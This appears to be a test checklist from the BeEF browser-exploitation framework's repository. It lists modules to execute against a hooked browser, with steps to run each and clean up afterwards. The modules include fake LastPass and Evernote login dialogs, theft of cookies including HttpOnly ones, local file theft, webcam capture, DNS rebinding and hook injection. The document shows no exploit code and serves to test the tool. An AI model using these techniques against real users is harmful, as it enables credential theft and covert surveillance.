These modules detect specific browser extensions which must be installed in the hooked browser to be detectable.
**Setup Steps:**
1. **LastPass**: Install the [LastPass Password Manager](https://addons.mozilla.org/en-US/firefox/addon/lastpass-password-manager/) extension in Firefox.
2. **FireBug**: Note that FireBug is legacy/obsolete. This module may only work on older browser versions or specific legacy environments.
| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [x] | **Detect FireBug** | 1. Execute module.<br>2. Verify detection if legacy FireBug is present. | None. | |
| [ ] | **Detect LastPass** | 1. Install LastPass extension.<br>2. Execute module.<br>3. Verify results show "Detected LastPass...". | Uninstall extension. | |
| [ ] | **Detect Toolbars** | 1. Install a supported toolbar (e.g. legacy Google Toolbar, Alexa Toolbar).<br>2. Execute module.<br>3. Verify results show the detected toolbar name. | Uninstall toolbar. | |
#### 3.2.8 BeEF Extensions (Requires Configuration)
Some modules require specific BeEF extensions to be enabled in the server configuration.
**Setup Steps:**
1. **Enable ETag Extension**:
- Open `config.yaml` in the BeEF root directory.
- Find the `extension: etag:` section.
- Set `enable: true`.
2. **Enable S2C DNS Tunnel Extension** (if testing DNS Tunnel S2C):
- In `config.yaml`, find `extension: s2c_dns_tunnel:`.
- Set `enable: true`.
3. **Restart BeEF**: You must restart the BeEF server for these changes to take effect.
| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **ETag Tunnel: Server-to-Client** | 1. Enable **ETag extension** in `config.yaml` and restart BeEF.<br>2. Set `Payload Name` and `Message`.<br>3. Execute module.<br>4. Verify message is delivered (check browser results/window property). | Disable extension in `config.yaml` (optional). | |
### 3.3 Phase 3: Other Browsers & Specialized Extensions
Test these modules **only if they cannot be tested in Firefox**. Use Chrome, Safari, or Edge.
| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **DNS Rebinding** | 1. Click Execute.<br><br>_dnsrebind_ | None. | |
| [ ] | **Detect Evernote Web Clipper** | 1. Click Execute.<br><br>_This module checks if the Evernote Web Clipper extension is installed and active._ | None. | |
| [ ] | **Execute On Tab** | 1. Configure: `URL`, `Javascript`<br>2. Click Execute.<br><br>_Open a new tab and execute the Javascript code on it. Chrome Extension specific._ | None. | |
| [ ] | **Fake Evernote Web Clipper Login** | 1. Click Execute.<br><br>_Displays a fake Evernote Web Clipper login dialog._ | None. | |
| [ ] | **Fake LastPass** | 1. Click Execute.<br><br>_Displays a fake LastPass user dialog. (Often Chrome specific)_ | None. | |
| [ ] | **Get All Cookies** | 1. Configure: `Domain (e.g. http://facebook.com)`<br>2. Click Execute.<br><br>_Steal cookies, even HttpOnly cookies, providing the hooked extension has cookies access._ | Clear browser cookies. | |
| [ ] | **Get Visited URLs (Avant Browser)** | 1. Configure: `Command ID`<br>2. Click Execute.<br><br>_Attempts to retrieve history requiring 'AFRunCommand()'. Avant Browser only._ | None. | |
| [ ] | **Get Visited URLs (Old Browsers)** | 1. Configure: `URL(s)`<br>2. Click Execute.<br><br>_Detects visited URLs in older browsers._ | None. | |
| [ ] | **Grab Google Contacts** | 1. Click Execute.<br><br>_Attempt to grab the contacts... exploiting export to CSV._ | None. | |
| [ ] | **Hook Microsoft Edge** | 1. Configure: `URL`<br>2. Click Execute.<br><br>_Uses 'microsoft-edge:' protocol handler to hook Edge._ | None. | |
| [ ] | **Inject BeEF** | 1. Click Execute.<br><br>_Attempt to inject the BeEF hook on all the available tabs._ | None. | |
| [ ] | **JSONP Service Worker** | 1. Configure: `Path of the current domain`...<br>2. Click Execute.<br><br>_Exploits unfiltered callback in JSONP endpoint._ | Close tab/window. Check for residual pop-unders. | |
| [ ] | **Local File Theft** | 1. Configure: `Target file`<br>2. Click Execute.<br><br>_JavaScript may have filesystem access if using file:// scheme (Safari/Local)._ | None. | |
| [ ] | **Make Skype Call** | 1. Configure: `Number`<br>2. Click Execute.<br><br>_Forces browser to Skype call. Protocol handler `skype:`._ | None. | |
| [ ] | **Make Telephone Call** | 1. Configure: `Number`<br>2. Click Execute.<br><br>_Forces browser to telephone call (iOS). Protocol handler `tel:`._ | None. | |
| [ ] | **Ping Sweep (Java)** | 1. Configure: `Scan IP range (C class or IP)`, `Timeout (ms)`<br>2. Click Execute.<br><br>_Discover active hosts... using unsigned Java applet. (Alt for FF)_ | None. | |
| [ ] | **Screenshot** | 1. Click Execute.<br><br>_Screenshots current tab (Chrome/HTML5)._ | None. | |
| [ ] | **Webcam HTML5** | 1. Configure: `Screenshot size`<br>2. Click Execute.<br><br>_Leverage HTML5 WebRTC to capture webcam images. Only tested in Chrome._ | None. | |
| [ ] | **iFrame Sniffer** | 1. Configure: `input URL`, `anchors to check`<br>2. Click Execute.<br><br>_Attempts to do framesniffing (aka Leaky Frame)._ | None. | |
Reference in New Issue View Git Blame Copy Permalink